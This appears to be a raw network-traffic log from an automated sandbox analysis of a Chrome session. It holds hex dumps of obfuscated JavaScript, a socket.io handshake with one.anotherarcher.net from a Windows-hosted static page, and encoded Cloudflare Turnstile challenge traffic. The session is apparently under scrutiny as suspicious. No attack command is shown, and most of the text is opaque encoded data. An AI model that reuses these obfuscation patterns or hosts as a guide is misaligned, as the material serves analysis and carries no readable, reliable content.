                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC1369INData Raw: 29 5d 28 64 5b 69 58 28 31 30 32 39 29 5d 28 4b 2c 31 29 2c 50 26 31 29 2c 4c 3d 3d 64 5b 69 58 28 37 31 33 29 5d 28 6f 2c 31 29 3f 28 4c 3d 30 2c 4a 5b 69 58 28 33 31 36 29 5d 28 64 5b 69 58 28 34 38 33 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b 2b 2c 50 3e 3e 3d 31 2c 43 2b 2b 29 3b 7d 47 2d 2d 2c 30 3d 3d 47 26 26 28 47 3d 4d 61 74 68 5b 69 58 28 31 34 34 30 29 5d 28 32 2c 49 29 2c 49 2b 2b 29 2c 64 65 6c 65 74 65 20 45 5b 46 5d 7d 65 6c 73 65 20 66 6f 72 28 50 3d 44 5b 46 5d 2c 43 3d 30 3b 43 3c 49 3b 4b 3d 64 5b 69 58 28 37 34 32 29 5d 28 4b 3c 3c 31 2c 64 5b 69 58 28 31 33 34 37 29 5d 28 50 2c 31 29 29 2c 4c 3d 3d 6f 2d 31 3f 28 4c 3d 30 2c 4a 5b 69 58 28 33 31 36 29 5d 28 64 5b 69 58 28 34 38 33 29 5d 28 73 2c 4b 29 29 2c 4b 3d 30 29 3a 4c 2b
                                                                                                                                                                                                                                Data Ascii: )](d[iX(1029)](K,1),P&1),L==d[iX(713)](o,1)?(L=0,J[iX(316)](d[iX(483)](s,K)),K=0):L++,P>>=1,C++);}G--,0==G&&(G=Math[iX(1440)](2,I),I++),delete E[F]}else for(P=D[F],C=0;C<I;K=d[iX(742)](K<<1,d[iX(1347)](P,1)),L==o-1?(L=0,J[iX(316)](d[iX(483)](s,K)),K=0):L+
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC1369INData Raw: 6a 30 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 6a 30 3d 69 56 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 6a 30 28 31 34 34 30 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 4b 21 3d 46 3b 29 66 6f 72 28 4c 3d 6a 30 28 39 33 32 29 5b 6a 30 28 32 32 33 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 46 2a 28 30 3c 4e 3f 31
                                                                                                                                                                                                                                Data Ascii: j0,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(j0=iV,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[j0(1440)](2,2),F=1;K!=F;)for(L=j0(932)[j0(223)]('|'),M=0;!![];){switch(L[M++]){case'0':0==H&&(H=j,G=o(I++));continue;case'1':J|=F*(0<N?1
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC1369INData Raw: 5b 6a 30 28 34 35 32 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4f 2c 64 5b 6a 30 28 37 35 35 29 5d 28 30 2c 78 29 26 26 28 78 3d 4d 61 74 68 5b 6a 30 28 31 34 34 30 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 69 56 28 37 31 35 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 49 28 31 32 34 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6a 65 2c 65 29 7b 65 3d 28 6a 65 3d 67 49 2c 7b 27 49 41 78 78 4f 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 5b 6a 65 28 38 32 33 29 5d 28 67 6f 2c 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 67 6d 28 67 6e 28 63 29 29 7d 7d 2c 67 70 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 6a 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c
                                                                                                                                                                                                                                Data Ascii: [j0(452)](0)),x--,E=O,d[j0(755)](0,x)&&(x=Math[j0(1440)](2,C),C++)}}},g={},g[iV(715)]=f.h,g}(),eM[gI(1244)]=function(c,je,e){e=(je=gI,{'IAxxO':function(g,h){return g(h)}});try{return e[je(823)](go,c)}catch(g){return gm(gn(c))}},gp=function(f,jf,g,h,i,j,k,


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                97192.168.2.44985579.137.248.1524432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC643OUTGET /socket.io/?EIO=4&transport=polling&t=P9KB5en HTTP/1.1
                                                                                                                                                                                                                                Host: one.anotherarcher.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Origin: https://q0ednre2adn0en00.z1.web.core.windows.net
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://q0ednre2adn0en00.z1.web.core.windows.net/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC225INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:28 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 118
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                cache-control: no-store
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC118INData Raw: 30 7b 22 73 69 64 22 3a 22 48 78 43 54 78 53 74 4f 70 58 6a 4c 4b 52 44 5f 41 41 4e 61 22 2c 22 75 70 67 72 61 64 65 73 22 3a 5b 22 77 65 62 73 6f 63 6b 65 74 22 5d 2c 22 70 69 6e 67 49 6e 74 65 72 76 61 6c 22 3a 32 35 30 30 30 2c 22 70 69 6e 67 54 69 6d 65 6f 75 74 22 3a 32 30 30 30 30 2c 22 6d 61 78 50 61 79 6c 6f 61 64 22 3a 31 30 30 30 30 30 30 7d
                                                                                                                                                                                                                                Data Ascii: 0{"sid":"HxCTxStOpXjLKRD_AANa","upgrades":["websocket"],"pingInterval":25000,"pingTimeout":20000,"maxPayload":1000000}


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                98192.168.2.449857104.18.95.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ccfd805a9cd425d/1727989041725/ojbtsX4PF9lVuS1 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:28 GMT
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd8407951c32f-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:28 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 48 00 00 00 17 08 02 00 00 00 27 57 9e 32 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                Data Ascii: PNGIHDRH'W2IDAT$IENDB`


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                99192.168.2.449861104.18.94.414432256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC927OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1438625525:1727987399:Ijto8JMFouAGt8YggseLV21TksqB395OrQnr3PCkYFY/8ccfd805a9cd425d/242f3f86f527414 HTTP/1.1
                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Content-Length: 31985
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                CF-Challenge: 242f3f86f527414
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Origin: https://challenges.cloudflare.com
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7i029/0x4AAAAAAAXfz5cXCad3M5bH/auto/fbE/normal/auto/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC16384OUTData Raw: 76 5f 38 63 63 66 64 38 30 35 61 39 63 64 34 32 35 64 3d 4e 70 73 6f 6e 2d 63 35 54 66 54 4d 55 25 32 62 6d 59 69 59 76 66 73 63 66 63 41 59 57 59 55 42 59 51 59 37 59 2d 4f 73 59 35 59 4e 59 32 6f 2d 44 63 37 59 72 34 78 7a 36 42 59 46 30 37 6f 49 42 78 35 63 6c 59 78 55 59 36 72 59 30 74 59 75 6f 56 35 76 6b 59 2d 54 4f 2d 2d 2b 76 52 4b 59 4c 59 56 70 59 39 59 76 73 6c 73 59 4e 6f 4d 51 55 4c 52 61 44 59 49 41 31 6a 6f 7a 76 6f 6f 38 46 6d 75 59 55 24 75 37 42 59 63 61 6f 63 62 30 2b 59 4b 59 76 34 63 57 59 63 35 2d 4a 42 72 59 34 73 4b 59 38 34 42 2b 4e 6b 4d 73 79 45 61 4f 2d 42 72 6f 6f 52 4d 49 32 71 61 59 69 57 6f 70 4f 52 52 77 59 30 4e 6f 61 6d 54 59 69 42 59 57 4a 31 4b 38 2b 6a 70 74 34 6c 6f 59 4c 32 66 66 61 6b 46 79 39 31 41 35 52 71 61 38
                                                                                                                                                                                                                                Data Ascii: v_8ccfd805a9cd425d=Npson-c5TfTMU%2bmYiYvfscfcAYWYUBYQY7Y-OsY5YNY2o-Dc7Yr4xz6BYF07oIBx5clYxUY6rY0tYuoV5vkY-TO--+vRKYLYVpY9YvslsYNoMQULRaDYIA1jozvoo8FmuYU$u7BYcaocb0+YKYv4cWYc5-JBrY4sKY84B+NkMsyEaO-BrooRMI2qaYiWopORRwY0NoamTYiBYWJ1K8+jpt4loYL2ffakFy91A5Rqa8
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC15601OUTData Raw: 2b 2b 44 4d 65 73 78 30 30 6f 66 50 57 48 7a 59 59 24 63 55 59 61 59 32 59 76 6f 4d 35 59 2d 59 73 30 63 30 59 50 59 4d 54 2d 71 59 37 59 66 56 59 44 59 62 59 63 6f 4d 39 34 6c 59 78 6e 37 74 59 42 6f 4d 55 59 6f 59 4b 6f 38 62 2d 6a 59 2d 6f 30 54 4d 79 59 73 59 76 54 4d 46 59 69 6f 78 59 59 70 59 76 59 66 55 59 6f 59 7a 6f 78 55 59 24 59 72 6f 2d 59 63 78 6f 6e 59 38 48 47 54 59 33 34 2b 6f 59 54 42 55 59 66 4f 63 6c 61 33 54 5a 42 59 4b 42 50 6d 39 6f 2d 39 6f 39 34 73 73 63 5a 59 78 6f 73 34 63 73 59 4a 6f 59 6f 59 34 59 70 35 76 32 61 6d 59 71 6a 59 43 59 59 59 71 76 33 63 6f 59 4a 6f 76 69 46 44 59 73 36 39 4a 6f 63 44 38 59 4e 4c 59 6b 42 56 59 4e 51 59 33 59 76 6f 30 6f 2d 69 59 51 42 4e 6d 4d 2d 59 32 35 4e 51 2d 2d 59 24 34 59 76 2d 6a 6f 64 59
                                                                                                                                                                                                                                Data Ascii: ++DMesx00ofPWHzYY$cUYaY2YvoM5Y-Ys0c0YPYMT-qY7YfVYDYbYcoM94lYxn7tYBoMUYoYKo8b-jY-o0TMyYsYvTMFYioxYYpYvYfUYoYzoxUY$Yro-YcxonY8HGTY34+oYTBUYfOcla3TZBYKBPm9o-9o94sscZYxos4csYJoYoY4Yp5v2amYqjYCYYYqv3coYJoviFDYs69JocD8YNLYkBVYNQY3Yvo0o-iYQBNmM-Y25NQ--Y$4Yv-jodY
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC300INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 20:57:29 GMT
                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                Content-Length: 26780
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                cf-chl-gen: g9U+TdNIBYHhtsbPvyQV31ljPsaVLTi2RVzDGzTRGVxw5DYx0ALQl7AaIclAtYL1INFopRMrXdbKdDcB$fJHH8LKm25cn4KjA
                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                CF-RAY: 8ccfd844dc0c7d00-EWR
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1069INData Raw: 63 71 6c 32 64 34 79 71 6a 6f 76 42 6c 6f 47 56 67 4b 61 45 78 62 6d 63 75 70 32 36 72 70 69 68 76 72 47 6b 6a 61 2b 31 79 74 44 43 79 35 6e 61 33 62 53 57 74 62 54 53 34 65 57 37 73 72 53 61 70 75 54 63 34 63 54 66 34 62 44 45 38 39 32 71 79 38 43 7a 71 72 61 35 37 50 58 55 79 66 47 79 30 62 7a 42 2f 67 62 63 2f 63 4c 59 30 2b 76 68 39 74 33 4e 44 42 4c 6f 43 74 2f 70 33 67 37 4b 42 4f 6e 5a 45 52 37 30 46 75 72 72 46 42 37 6a 42 68 7a 6c 48 69 6f 42 34 68 33 33 4c 53 6f 79 2b 53 67 42 35 76 49 4c 4b 54 41 4e 46 76 6f 35 43 54 41 55 2b 68 6c 45 4e 6b 49 5a 50 6a 41 4a 46 54 6b 4c 2f 69 6b 75 44 6b 67 78 48 45 52 4e 4b 44 45 34 4a 6b 4e 4c 4e 43 30 77 4e 79 38 61 46 46 42 6c 49 79 5a 68 4a 6d 6b 70 48 53 55 66 4b 30 78 75 55 6d 70 6a 5a 6d 6c 42 4e 31 6c
                                                                                                                                                                                                                                Data Ascii: cql2d4yqjovBloGVgKaExbmcup26rpihvrGkja+1ytDCy5na3bSWtbTS4eW7srSapuTc4cTf4bDE892qy8Czqra57PXUyfGy0bzB/gbc/cLY0+vh9t3NDBLoCt/p3g7KBOnZER70FurrFB7jBhzlHioB4h33LSoy+SgB5vILKTANFvo5CTAU+hlENkIZPjAJFTkL/ikuDkgxHERNKDE4JkNLNC0wNy8aFFBlIyZhJmkpHSUfK0xuUmpjZmlBN1l
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 4e 33 61 72 39 62 5a 73 38 33 4e 35 70 33 6b 70 71 4f 6e 36 4c 6e 5a 7a 71 33 4a 34 4f 62 42 36 4d 76 55 79 72 65 34 78 66 6a 65 37 72 55 43 30 2b 37 36 38 64 6a 6d 77 4f 6a 6e 2b 64 34 49 33 38 66 4c 44 64 38 41 37 51 51 4d 37 52 41 61 42 77 7a 35 36 2f 62 5a 43 75 67 67 45 66 7a 73 4a 65 34 44 42 43 4d 6a 2b 79 59 4d 4c 75 55 64 36 75 72 76 49 51 59 69 46 2f 55 53 4b 6a 51 39 4f 7a 41 72 45 78 70 42 45 42 42 45 2f 54 51 4a 53 68 67 61 4a 78 68 49 49 51 4d 6e 47 79 30 67 56 52 4a 50 4b 54 4a 4a 47 53 77 6d 55 55 67 73 59 57 46 51 4d 57 5a 56 4f 7a 4a 6f 4b 6c 64 49 5a 32 64 41 61 6c 42 79 4b 6d 45 76 4c 7a 52 6c 53 6d 5a 71 4f 6c 5a 74 56 33 42 35 66 6e 74 39 68 6d 65 46 57 47 4e 38 68 32 42 68 58 59 68 67 69 6f 74 4c 69 5a 4e 56 69 5a 6c 77 6c 5a 68 74
                                                                                                                                                                                                                                Data Ascii: N3ar9bZs83N5p3kpqOn6LnZzq3J4ObB6MvUyre4xfje7rUC0+768djmwOjn+d4I38fLDd8A7QQM7RAaBwz56/bZCuggEfzsJe4DBCMj+yYMLuUd6urvIQYiF/USKjQ9OzArExpBEBBE/TQJShgaJxhIIQMnGy0gVRJPKTJJGSwmUUgsYWFQMWZVOzJoKldIZ2dAalByKmEvLzRlSmZqOlZtV3B5fnt9hmeFWGN8h2BhXYhgiotLiZNViZlwlZht
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 53 6c 30 37 2b 66 76 74 66 44 37 64 7a 42 77 2b 66 6f 30 37 50 6d 35 64 61 30 30 38 66 61 75 64 44 62 33 76 61 38 38 75 4c 44 39 75 58 6b 30 38 67 46 42 2b 48 31 35 73 6f 42 36 74 38 4c 2f 51 6e 54 7a 2f 6a 57 39 51 62 75 32 66 66 74 41 52 44 7a 34 65 50 33 39 50 76 67 49 79 62 39 48 41 45 74 48 76 66 71 38 54 51 43 41 76 41 30 42 76 4d 69 4e 41 37 75 45 78 63 71 44 45 49 4c 46 51 34 65 42 6a 38 55 45 69 4d 6a 47 43 63 4b 42 69 67 63 4e 43 70 53 4a 6b 64 51 4f 43 64 57 48 44 73 34 47 43 38 38 54 6c 55 79 4d 43 49 67 51 56 46 69 5a 57 31 6a 58 6d 6f 69 5a 6c 34 75 5a 54 39 41 63 44 51 35 55 55 5a 47 64 31 5a 71 55 7a 35 63 55 6d 56 30 57 45 5a 49 58 46 6c 67 52 58 35 76 59 6f 42 6d 61 34 46 52 55 6f 4a 76 59 46 43 55 5a 33 75 4f 65 4a 53 4e 6d 5a 32 59 58
                                                                                                                                                                                                                                Data Ascii: Sl07+fvtfD7dzBw+fo07Pm5da008faudDb3va88uLD9uXk08gFB+H15soB6t8L/QnTz/jW9Qbu2fftARDz4eP39PvgIyb9HAEtHvfq8TQCAvA0BvMiNA7uExcqDEILFQ4eBj8UEiMjGCcKBigcNCpSJkdQOCdWHDs4GC88TlUyMCIgQVFiZW1jXmoiZl4uZT9AcDQ5UUZGd1ZqUz5cUmV0WEZIXFlgRX5vYoBma4FRUoJvYFCUZ3uOeJSNmZ2YX
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 2b 31 4b 58 76 35 63 32 73 79 63 62 6d 73 75 76 58 2b 4c 69 73 2b 66 6a 6d 36 64 66 64 39 4f 2f 62 76 4d 58 7a 33 77 72 65 39 2b 4d 4f 36 65 41 4a 78 68 48 4b 45 4f 58 6d 47 50 6a 68 30 42 67 54 36 78 6e 7a 43 4e 4c 35 34 75 41 59 44 78 63 48 46 52 33 71 43 41 77 4d 48 69 49 4b 36 79 73 30 4b 41 30 56 4d 76 67 6c 45 77 55 6d 4b 6a 39 42 50 55 46 41 4d 44 6b 37 4f 6a 38 79 46 44 56 4a 43 77 67 68 43 53 6f 2f 55 78 41 32 46 51 39 50 54 68 49 77 52 51 38 33 4c 42 31 53 57 31 4e 50 51 6a 4a 45 61 56 4a 47 4f 31 52 6e 5a 55 6f 6e 62 43 68 53 55 44 31 58 62 6a 52 68 56 56 70 59 4d 33 49 35 65 6e 74 41 66 6e 4e 76 64 6c 65 4a 68 45 47 47 68 57 57 42 52 58 6c 51 52 46 4a 39 61 57 42 57 67 57 31 35 61 31 68 33 65 70 71 5a 67 4a 56 5a 6a 57 4e 7a 6c 59 65 6e 61 61
                                                                                                                                                                                                                                Data Ascii: +1KXv5c2sycbmsuvX+Lis+fjm6dfd9O/bvMXz3wre9+MO6eAJxhHKEOXmGPjh0BgT6xnzCNL54uAYDxcHFR3qCAwMHiIK6ys0KA0VMvglEwUmKj9BPUFAMDk7Oj8yFDVJCwghCSo/UxA2FQ9PThIwRQ83LB1SW1NPQjJEaVJGO1RnZUonbChSUD1XbjRhVVpYM3I5entAfnNvdleJhEGGhWWBRXlQRFJ9aWBWgW15a1h3epqZgJVZjWNzlYenaa
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 71 72 7a 49 77 62 37 33 79 2b 33 4a 74 63 62 31 30 2b 7a 30 34 64 77 41 32 39 38 47 43 66 58 65 41 4e 6e 57 2b 77 72 69 44 74 44 50 42 67 58 6e 45 73 6b 46 30 74 62 5a 44 4e 51 63 46 2b 38 57 48 41 58 57 2b 74 37 77 2f 50 58 79 4c 41 41 69 2f 65 6e 36 4b 68 41 64 42 7a 45 57 38 76 45 6f 46 78 55 54 4c 6a 6f 73 41 55 44 30 4e 69 51 44 4d 52 41 65 4f 41 67 57 51 77 42 4a 50 55 49 6b 50 30 31 4a 51 45 42 45 4c 78 55 6c 4d 52 4e 61 50 46 56 55 56 56 31 44 4a 54 31 68 61 45 46 55 58 56 56 6a 4e 30 4a 70 61 53 6f 70 51 6b 4d 77 51 58 4d 7a 62 7a 64 4d 5a 54 77 38 50 6e 70 37 66 6c 4e 66 4f 48 6c 55 63 59 52 4a 52 30 64 6d 67 57 4e 68 58 55 35 39 64 49 4f 42 62 35 42 32 63 35 52 56 69 35 43 49 61 6e 74 76 59 58 64 65 5a 57 4a 7a 6f 70 36 5a 6a 6f 61 71 69 35 43
                                                                                                                                                                                                                                Data Ascii: qrzIwb73y+3Jtcb10+z04dwA298GCfXeANnW+wriDtDPBgXnEskF0tbZDNQcF+8WHAXW+t7w/PXyLAAi/en6KhAdBzEW8vEoFxUTLjosAUD0NiQDMRAeOAgWQwBJPUIkP01JQEBELxUlMRNaPFVUVV1DJT1haEFUXVVjN0JpaSopQkMwQXMzbzdMZTw8Pnp7flNfOHlUcYRJR0dmgWNhXU59dIOBb5B2c5RVi5CIantvYXdeZWJzop6Zjoaqi5C
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 74 48 52 30 73 58 48 36 39 37 57 2f 76 66 6b 2f 41 48 52 77 73 44 38 31 39 6e 63 2b 38 58 33 32 4d 6e 53 37 2f 41 41 37 65 37 68 34 77 6a 36 38 68 73 55 38 52 6b 64 37 64 37 64 41 2f 50 31 41 66 4d 56 4c 41 41 65 4c 68 6f 4f 2f 67 4c 2b 4e 6a 51 50 4c 66 41 37 4e 50 63 2b 45 44 67 63 38 67 30 61 48 43 45 66 4d 69 55 58 45 78 4d 35 46 78 59 47 50 42 6c 51 52 53 51 74 53 43 73 31 4a 53 4d 61 4c 43 67 33 47 69 73 72 4f 6c 49 32 4d 42 30 33 55 55 46 70 52 30 51 38 62 46 31 46 51 47 42 48 52 54 39 43 62 57 4a 52 61 54 64 4b 54 55 70 54 58 56 46 4b 66 57 35 66 64 6c 52 6e 59 58 6c 48 5a 47 31 62 54 33 31 77 62 31 4e 6b 63 55 35 50 59 33 4a 32 62 49 70 38 56 6c 2b 4c 67 46 70 72 6b 6e 31 65 67 35 4a 30 71 57 61 5a 66 48 61 65 65 6f 43 6c 6f 70 53 54 62 34 43 49
                                                                                                                                                                                                                                Data Ascii: tHR0sXH697W/vfk/AHRwsD819nc+8X32MnS7/AA7e7h4wj68hsU8Rkd7d7dA/P1AfMVLAAeLhoO/gL+NjQPLfA7NPc+EDgc8g0aHCEfMiUXExM5FxYGPBlQRSQtSCs1JSMaLCg3GisrOlI2MB03UUFpR0Q8bF1FQGBHRT9CbWJRaTdKTUpTXVFKfW5fdlRnYXlHZG1bT31wb1NkcU5PY3J2bIp8Vl+LgFprkn1eg5J0qWaZfHaeeoClopSTb4CI
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 37 65 75 73 76 75 33 66 67 43 39 4f 62 38 32 2b 62 73 36 67 62 71 37 4d 6e 4b 34 66 50 69 30 67 58 33 39 2b 4d 48 2b 39 62 72 44 50 77 55 42 41 34 42 47 76 4d 51 43 51 6a 7a 46 77 7a 36 4c 68 6b 4b 4a 65 6f 69 46 41 50 79 49 78 55 74 4e 69 51 5a 4d 54 59 4f 49 42 38 2b 4c 43 54 39 48 43 49 6f 50 55 49 31 4a 6b 49 59 4f 44 45 76 55 6a 34 30 44 6c 5a 48 4e 55 77 38 52 54 78 52 58 6b 34 39 56 54 52 4e 51 52 34 34 56 30 4a 64 5a 6b 64 4d 4f 79 39 59 55 55 39 45 58 31 46 70 53 45 5a 59 52 33 5a 71 58 45 74 32 62 31 31 31 67 6d 78 6c 55 6d 68 79 61 56 65 47 65 47 6d 42 59 47 70 76 53 6f 70 2f 62 6f 6c 50 67 6e 69 4e 62 49 5a 38 61 35 36 4e 66 5a 57 61 63 6f 53 44 65 4a 4f 49 59 6d 4f 48 69 36 46 72 6d 49 39 70 6c 4b 43 54 71 62 61 69 6d 49 65 36 71 4a 32 63 6a
                                                                                                                                                                                                                                Data Ascii: 7eusvu3fgC9Ob82+bs6gbq7MnK4fPi0gX39+MH+9brDPwUBA4BGvMQCQjzFwz6LhkKJeoiFAPyIxUtNiQZMTYOIB8+LCT9HCIoPUI1JkIYODEvUj40DlZHNUw8RTxRXk49VTRNQR44V0JdZkdMOy9YUU9EX1FpSEZYR3ZqXEt2b111gmxlUmhyaVeGeGmBYGpvSop/bolPgniNbIZ8a56NfZWacoSDeJOIYmOHi6FrmI9plKCTqbaimIe6qJ2cj
                                                                                                                                                                                                                                2024-10-03 20:57:29 UTC1369INData Raw: 6a 30 64 72 41 35 2f 6e 72 41 66 33 76 37 4d 67 43 41 50 45 4a 39 77 54 77 30 50 63 46 2b 78 38 4b 2f 76 4c 5a 2f 76 76 75 2f 69 62 78 2b 2b 45 57 46 41 6f 49 37 67 37 39 2f 53 45 43 41 44 51 6c 45 51 67 6f 44 42 6b 51 39 42 77 66 48 2f 6f 4d 44 78 49 67 44 78 73 59 46 6b 46 4c 4b 6b 34 47 43 43 39 44 50 69 49 6c 53 55 46 54 4c 6a 64 56 46 6a 5a 4f 4e 44 38 30 50 55 42 4f 4f 68 31 48 57 6b 5a 71 49 69 52 4d 53 56 6f 2b 51 6b 39 64 62 30 70 54 4d 6a 4a 53 61 6c 78 62 55 46 6c 63 62 56 59 35 59 33 6c 69 68 6a 35 41 61 56 56 32 57 6c 39 62 65 59 74 6d 63 46 39 4f 63 6d 39 66 61 57 68 6d 61 35 70 36 56 70 5a 39 67 57 39 66 68 48 6c 7a 67 36 61 43 68 6f 68 33 65 6f 68 33 67 34 42 2b 71 61 75 53 74 34 43 56 67 62 6d 45 68 70 74 33 69 4b 43 56 6a 70 65 79 6a 38
